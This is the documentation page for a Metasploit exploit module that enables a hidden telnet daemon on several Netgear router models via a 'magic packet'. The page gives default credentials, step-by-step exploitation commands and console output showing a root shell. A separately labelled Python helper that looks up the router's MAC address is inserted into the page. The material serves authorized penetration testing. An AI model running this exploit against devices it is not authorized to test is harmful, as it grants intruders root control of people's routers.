metasploit-gs/documentation/modules/exploit/linux/telnet/netgear_telnetenable.md
## Intro
Several models of Netgear devices have a hidden telnet daemon that can be
enabled for remote LAN users by sending a 'magic packet' to the device.
Upon a successful connection, a root shell should be presented to the user.
There are many devices which contain this daemon; for a full list see [OpenWrt](https://wiki.openwrt.org/toh/netgear/telnet.console).
This module has been successfully tested against:

- AC1450 in whatever version I bought it with (TCP)
- AC1450 latest V1.0.0.36_10.0.17 (UDP)
- N300 WNR2000 v3 (TCP)

## Setup
A MAC address is required for exploitation. To determine the MAC address of the device:

1. Ping the device to force an ARP lookup: `ping -c 1 [IP]`
2. Get the MAC: `arp -an [IP]`
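Scripting the two Setup steps above, as an added example that is not part of the module or its documentation: it runs the same `ping` and `arp -an` commands, parses the arp line format shown in the Usage section into the form the module's `MAC` option expects, and returns `None` when the ARP entry is still incomplete (the device never answered). The regex and the sample arp output are constructed here, not taken from a real device.

```python
import re
import subprocess

# Matches one line of `arp -an` output, e.g. (net-tools on Linux)
#   ? (192.168.1.1) at aa:bb:cc:dd:ee:ff [ether] on wlan0
# or, when the device has not replied and the entry is unresolved,
#   ? (192.168.1.1) at <incomplete> on wlan0
# Octets are allowed to be one hex digit because some BSD/macOS arp
# implementations print them without leading zeros.
ARP_LINE = re.compile(
    r"^\S+\s+\((?P<ip>[\d.]+)\)\s+at\s+"
    r"(?P<mac>[0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5}|<incomplete>)"
)


def parse_arp_output(output, ip):
    """Return the MAC recorded for `ip` in `arp -an` output, normalised to
    lower-case, two-digit, colon-separated octets; None if the entry is
    missing or still incomplete."""
    for line in output.splitlines():
        m = ARP_LINE.match(line.strip())
        if not m or m.group("ip") != ip:
            continue
        mac = m.group("mac")
        if mac == "<incomplete>":
            return None
        return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))
    return None


def lookup_mac(ip):
    """Ping once to populate the ARP cache, then read the MAC back from it."""
    subprocess.run(["ping", "-c", "1", ip], capture_output=True, timeout=10)
    arp = subprocess.run(["arp", "-an", ip], capture_output=True, text=True)
    return parse_arp_output(arp.stdout, ip)


# Constructed sample output (not captured from a real device):
SAMPLE = """\
? (192.168.1.1) at AA:BB:CC:DD:EE:FF [ether] on wlan0
? (192.168.1.2) at <incomplete> on wlan0
"""

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(lookup_mac(target) if target else parse_arp_output(SAMPLE, "192.168.1.1"))
```

Run it with the device IP as the only argument; a `None` result means the ping got no reply and the module's `MAC` option cannot be filled from the ARP cache yet.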
## Targets
**0 (Automatic)**

Detects whether the device listens on TCP or UDP.

**1 (TCP)**

Older devices usually listen on TCP.

**2 (UDP)**

Newer devices usually listen on UDP.

## Options

**MAC**

Set this to the MAC address of the device. You can use `ping` and `arp`
to find it.

**USERNAME**

If this is an older device, it'll take the value of `super_username` in
`nvram`. `Gearguy` is usually correct.
If this is a newer device, it'll take the web UI username, which is
usually unchanged from `admin`.

**PASSWORD**

If this is an older device, it'll take the value of `super_passwd` in
`nvram`. `Geardog` is usually correct.
If this is a newer device, it'll take the web UI password, which is
usually unchanged from `password`.

**VERBOSE**

This will display the username and password used in the magic packet.

## Exploitation

1. Make sure you have a vulnerable device
2. Start metasploit
3. `use exploit/linux/telnet/netgear_telnetenable`
4. `set rhost [IP]`
5. `set mac [MAC Address]`
6. `exploit`
7. Enjoy a root shell!

## Usage
```
msf5 > use exploit/linux/telnet/netgear_telnetenable
msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf5 exploit(linux/telnet/netgear_telnetenable) > ping -c 1 192.168.1.1
[*] exec: ping -c 1 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.19 ms
--- 192.168.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.198/1.198/1.198/0.000 ms
msf5 exploit(linux/telnet/netgear_telnetenable) > arp -an 192.168.1.1
[*] exec: arp -an 192.168.1.1
? (192.168.1.1) at [redacted] [ether] on wlan0
msf5 exploit(linux/telnet/netgear_telnetenable) > set mac [redacted]
mac => [redacted]
msf5 exploit(linux/telnet/netgear_telnetenable) > set verbose true
verbose => true
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetenabled on UDP
[*] 192.168.1.1:23 - Using creds admin:password
[*] 192.168.1.1:23 - Generating magic packet
[*] 192.168.1.1:23 - Connecting to telnetenabled
[*] 192.168.1.1:23 - Sending magic packet
[*] 192.168.1.1:23 - Disconnecting from telnetenabled
[*] 192.168.1.1:23 - Waiting for telnetd
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
id
id
uid=0 gid=0(root)
# uname -a
uname -a
Linux (none) 2.6.36.4brcmarm+ #16 SMP PREEMPT Wed Mar 22 15:02:38 CST 2017 armv7l unknown
#
```
If you've already exploited TelnetEnable and `telnetd` is still running, the
exploit will attempt to connect to `telnetd` directly. This saves us from
sending the magic packet again.
```
msf5 exploit(linux/telnet/netgear_telnetenable) > run
[+] 192.168.1.1:23 - Detected telnetd on TCP
[*] 192.168.1.1:23 - Connecting to telnetd
[*] Found shell.
```